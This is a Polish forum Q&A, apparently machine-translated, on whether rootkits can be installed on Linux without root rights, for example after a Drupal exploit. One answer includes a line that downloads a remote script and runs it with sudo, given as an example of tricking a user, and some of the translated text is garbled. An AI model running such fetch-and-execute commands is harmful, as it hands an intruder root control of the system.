Widziałem kilka postów na temat sprawdzania rootkitów, ale nie byłem w stanie znaleźć żadnych informacji na temat tego, jak dostają się do systemu Linux. W szczególności, jeśli wykorzystujesz błąd na stronie php (tak, tutaj mówię o drupageddon ), czy możesz zainstalować rootkita, nawet jeśli możesz działać tylko jako serwer WWW (dane www), a nie jako root. Bardzo niewiele informacji, które znalazłem na temat ich instalacji sugeruje, że musisz być rootem, aby je zainstalować (patrz tutaj ).
11
wget http://mydomain/script.sh;sudo ./script.sh
Odpowiedzi:
Gdybym to był ja, zastosowałbym następującą metodę:
Odnośnie nr 1: użytkownik nigdy nie powinien pobierać losowego oprogramowania podczas korzystania z Linuksa; użyj odpowiednich kanałów (Centrum oprogramowania Ubuntu), aby zainstalować oprogramowanie. Jeśli jest to oprogramowanie, które należy pobrać poza odpowiednie kanały, upewnij się, że źródłu pobierania można zaufać. Pomyśl o najnowszych wersjach oprogramowania Apache lub MySQL. Nie przejmuj się pobieraniem losowego oprogramowania bez sprawdzania różnych mediów społecznościowych dotyczących integralności tej aplikacji. Microsoft nigdy nie scentralizowanego oprogramowania; spowodowało to, że wiele osób zajmowało się oprogramowaniem, więc ich baza użytkowników jest hugh, ale także ułatwiło dostęp do komputerów i rozpoczęcie gromadzenia danych, które mogą sprzedawać.
Odnośnie # 2: fatalna wada użytkownika. Nigdy nie wpisuj hasła administratora, chyba że wiesz, dlaczego jest ono wymagane.
źródło
Tak, ogólnie, aby zainstalować rootkita, wymagane są uprawnienia administratora. Wiele rootkitów zawiera moduł ładowany do jądra, inne narzędzie po prostu nadpisujące, zwykle używane przez roota. W prawidłowo ustawionym i idealnym systemie nie byłoby sposobu, aby zainstalować zestaw root bez uprawnień root, ale ...
... mogą występować problemy z konfiguracją systemu, które powodują, że system jest niebezpieczny. ... mogą występować błędy bezpieczeństwa, które pozwalają na podniesienie uprawnień ... mogą istnieć sposoby na oszukanie użytkownika z uprawnieniami roota, aby uruchomić coś złego.
Sposoby są tak nieograniczone, jak wyobraźnia intruza.
źródło